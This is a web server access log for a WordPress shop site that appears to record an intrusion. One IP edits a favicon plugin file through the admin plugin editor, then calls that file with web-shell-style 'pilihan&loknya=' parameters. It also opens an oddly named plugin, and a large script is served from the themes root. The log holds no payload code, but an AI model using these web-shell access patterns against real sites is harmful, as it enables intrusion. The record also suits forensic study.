182.3.169.128 - - [25/Feb/2026:12:21:07 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:21:08 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:21:17 +0000] "GET /wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&file=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&wp_scrape_key=99a9af51e6f25e750b23e96f60be0464&wp_scrape_nonce=424442782 HTTP/1.1" 500 307 "-" "WordPress/6.9.1; https://caketoppers.com"
54.38.145.185 - - [25/Feb/2026:12:21:18 +0000] "POST /wp-cron.php?doing_wp_cron=1772022078.4780690670013427734375 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:21:17 +0000] "POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1" 200 207 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:22:00 +0000] "GET /wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&file=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&wp_scrape_key=7b69136de3b4e1d7645d6f70035aa0a0&wp_scrape_nonce=113348138 HTTP/1.1" 200 162218 "-" "WordPress/6.9.1; https://caketoppers.com"
54.38.145.185 - - [25/Feb/2026:12:22:01 +0000] "GET /?wp_scrape_key=7b69136de3b4e1d7645d6f70035aa0a0&wp_scrape_nonce=113348138 HTTP/1.1" 200 61058 "-" "WordPress/6.9.1; https://caketoppers.com"
54.38.145.185 - - [25/Feb/2026:12:22:02 +0000] "POST /wp-cron.php?doing_wp_cron=1772022122.4596600532531738281250 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:21:58 +0000] "POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1" 200 63 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:22:12 +0000] "GET /wp-content/plugins/favicon-by-realfavicongenerator/favicon-by-realfavicongenerator.php HTTP/1.1" 200 29139 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:22:14 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 162067 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:22:26 +0000] "GET /favicon.ico HTTP/1.1" 200 60910 "https://caketoppers.com/wp-content/plugins/favicon-by-realfavicongenerator/favicon-by-realfavicongenerator.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:22:33 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 162067 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:23:10 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 162067 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
45.172.57.235 - - [25/Feb/2026:12:23:13 +0000] "GET /product/personalised-adult-birthday-acrylic-cake-topper-18-21-30-any-age-any-name/ HTTP/1.1" 200 60910 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/537.36 (KHTML, like Gecko, Mediapartners-Google) Chrome/83.0.4103.118 Safari/537.36"
40.77.167.230 - - [25/Feb/2026:12:23:56 +0000] "GET /wp-content/uploads/2022/01/2-GLITTERSILVER-768x768.jpg HTTP/1.1" 200 169718 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:24:10 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 162067 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:24:17 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 162067 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:24:34 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 162067 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:25:04 +0000] "GET /wp-login.php HTTP/1.1" 200 60913 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:25:32 +0000] "GET /wp-login.php HTTP/1.1" 200 60913 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:26:46 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 162067 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:27:52 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 162067 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:27:52 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 162067 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:28:11 +0000] "POST /wp-content/plugins/favicon-by-realfavicongenerator/favicon-by-realfavicongenerator.php?pilihan&loknya=/home/gd5hzp4/public_html/wp-content/plugins/favicon-by-realfavicongenerator HTTP/1.1" 200 30433 "https://caketoppers.com/wp-content/plugins/favicon-by-realfavicongenerator/favicon-by-realfavicongenerator.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:28:18 +0000] "POST /wp-content/plugins/favicon-by-realfavicongenerator/favicon-by-realfavicongenerator.php?pilihan&loknya=/home/gd5hzp4/public_html/wp-content/plugins/favicon-by-realfavicongenerator HTTP/1.1" 200 31695 "https://caketoppers.com/wp-content/plugins/favicon-by-realfavicongenerator/favicon-by-realfavicongenerator.php?pilihan&loknya=/home/gd5hzp4/public_html/wp-content/plugins/favicon-by-realfavicongenerator" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:28:23 +0000] "POST /wp-content/plugins/favicon-by-realfavicongenerator/favicon-by-realfavicongenerator.php?pilihan&loknya=/home/gd5hzp4/public_html/wp-content/plugins/favicon-by-realfavicongenerator HTTP/1.1" 200 - "https://caketoppers.com/wp-content/plugins/favicon-by-realfavicongenerator/favicon-by-realfavicongenerator.php?pilihan&loknya=/home/gd5hzp4/public_html/wp-content/plugins/favicon-by-realfavicongenerator" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:28:25 +0000] "POST /wp-cron.php?doing_wp_cron=1772022505.1429450511932373046875 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:28:23 +0000] "GET /favicon.ico HTTP/1.1" 302 - "https://caketoppers.com/wp-content/plugins/favicon-by-realfavicongenerator/favicon-by-realfavicongenerator.php?pilihan&loknya=/home/gd5hzp4/public_html/wp-content/plugins/favicon-by-realfavicongenerator" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:28:25 +0000] "POST /wp-cron.php?doing_wp_cron=1772022505.4487600326538085937500 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:28:25 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:28:25 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:28:28 +0000] "GET /wp-login.php HTTP/1.1" 200 11045 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:28:28 +0000] "GET /wp-admin/css/l10n.min.css?ver=6.9.1 HTTP/1.1" 200 3200 "https://caketoppers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:28:28 +0000] "GET /wp-admin/css/forms.min.css?ver=6.9.1 HTTP/1.1" 200 28422 "https://caketoppers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:28:28 +0000] "GET /wp-content/themes/prdctfltr.js?ver=1772022508 HTTP/1.1" 200 303107 "https://caketoppers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:28:28 +0000] "GET /wp-admin/js/password-strength-meter.min.js?ver=6.9.1 HTTP/1.1" 200 1123 "https://caketoppers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:28:28 +0000] "GET /wp-admin/js/user-profile.min.js?ver=6.9.1 HTTP/1.1" 200 7997 "https://caketoppers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:28:29 +0000] "GET /wp-admin/css/login.min.css?ver=6.9.1 HTTP/1.1" 200 6381 "https://caketoppers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:28:30 +0000] "GET /wp-admin/images/wordpress-logo.svg?ver=20131107 HTTP/1.1" 200 1521 "https://caketoppers.com/wp-admin/css/login.min.css?ver=6.9.1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:28:30 +0000] "GET /wp-content/uploads/fbrfg/favicon.ico HTTP/1.1" 200 15086 "https://caketoppers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:29:26 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:29:28 +0000] "POST /wp-cron.php?doing_wp_cron=1772022568.1224999427795410156250 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:29:26 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:30:30 +0000] "POST /wp-cron.php?doing_wp_cron=1772022630.4301838874816894531250 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:30:26 +0000] "POST /wp-login.php HTTP/1.1" 302 - "https://caketoppers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:30 +0000] "GET /wp-admin/ HTTP/1.1" 200 351217 "https://caketoppers.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:34 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,site-health,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-poi&load%5Bchunk_1%5D=nter,widgets,site-icon,l10n,buttons,wp-auth-check,wp-components,wp-commands,wp-color-picker,media-views&ver=6.9.1 HTTP/1.1" 200 581074 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:34 +0000] "GET /wp-content/themes/prdctfltr.js?ver=1772022631 HTTP/1.1" 200 303107 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:34 +0000] "GET /wp-json/wp/v2/users/me?context=edit&_locale=user HTTP/1.1" 200 11992 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:34 +0000] "GET /wp-json/wp/v2/ HTTP/1.1" 200 225150 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:35 +0000] "POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1" 200 44 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:35 +0000] "POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1" 200 102 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:40 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:45 +0000] "GET /wp-admin/plugin-editor.php HTTP/1.1" 200 380019 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:47 +0000] "GET /wp-content/themes/prdctfltr.js?ver=1772022645 HTTP/1.1" 200 303107 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:47 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,code-editor,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-poi&load%5Bchunk_1%5D=nter,widgets,site-icon,l10n,buttons,wp-auth-check,wp-components,wp-commands,wp-color-picker,media-views&ver=6.9.1 HTTP/1.1" 200 577159 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:47 +0000] "GET /wp-json/wp/v2/users/me?context=edit&_locale=user HTTP/1.1" 200 11992 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:52 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:30:57 +0000] "POST /wp-cron.php?doing_wp_cron=1772022657.6492779254913330078125 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:30:57 +0000] "GET /wp-admin/plugin-editor.php?plugin=46baaade%2Fprotect-uploads.php&Submit=Select HTTP/1.1" 200 300063 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:58 +0000] "GET /wp-content/themes/prdctfltr.js?ver=1772022657 HTTP/1.1" 200 303107 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=46baaade%2Fprotect-uploads.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:58 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,code-editor,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-poi&load%5Bchunk_1%5D=nter,widgets,site-icon,l10n,buttons,wp-auth-check,wp-components,wp-commands,wp-color-picker,media-views&ver=6.9.1 HTTP/1.1" 200 577159 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=46baaade%2Fprotect-uploads.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:30:58 +0000] "GET /wp-json/wp/v2/users/me?context=edit&_locale=user HTTP/1.1" 200 11992 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=46baaade%2Fprotect-uploads.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:31:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=46baaade%2Fprotect-uploads.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:31:04 +0000] "POST /wp-cron.php?doing_wp_cron=1772022664.7038540840148925781250 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:30:43 +0000] "GET /wp-admin/plugins.php HTTP/1.1" 200 490242 "https://caketoppers.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:31:08 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:31:26 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 80 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:31:27 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 80 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:32:05 +0000] "POST /wp-cron.php?doing_wp_cron=1772022725.9303181171417236328125 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:32:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=46baaade%2Fprotect-uploads.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:32:09 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:33:06 +0000] "POST /wp-cron.php?doing_wp_cron=1772022785.9944319725036621093750 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:33:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=46baaade%2Fprotect-uploads.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:33:10 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:33:28 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
54.38.145.185 - - [25/Feb/2026:12:33:30 +0000] "POST /wp-cron.php?doing_wp_cron=1772022810.0302670001983642578125 HTTP/1.1" 200 - "-" "WordPress/6.9.1; https://caketoppers.com"
182.3.169.128 - - [25/Feb/2026:12:33:27 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 147 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=favicon-by-realfavicongenerator%2Ffavicon-by-realfavicongenerator.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:33:47 +0000] "GET /wp-admin/plugin-editor.php?file=46baaade%2Flanguages%2Findex.php&plugin=46baaade%2Fprotect-uploads.php HTTP/1.1" 200 299285 "https://caketoppers.com/wp-admin/plugin-editor.php?plugin=46baaade%2Fprotect-uploads.php&Submit=Select" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
182.3.169.128 - - [25/Feb/2026:12:33:50 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,code-editor,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-poi&load%5Bchunk_1%5D=nter,widgets,site-icon,l10n,buttons,wp-auth-check,wp-components,wp-commands,wp-color-picker,media-views&ver=6.9.1 HTTP/1.1" 200 577159 "https://caketoppers.com/wp-admin/plugin-editor.php?file=46baaade%2Flanguages%2Findex.php&plugin=46baaade%2Fprotect-uploads.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36"
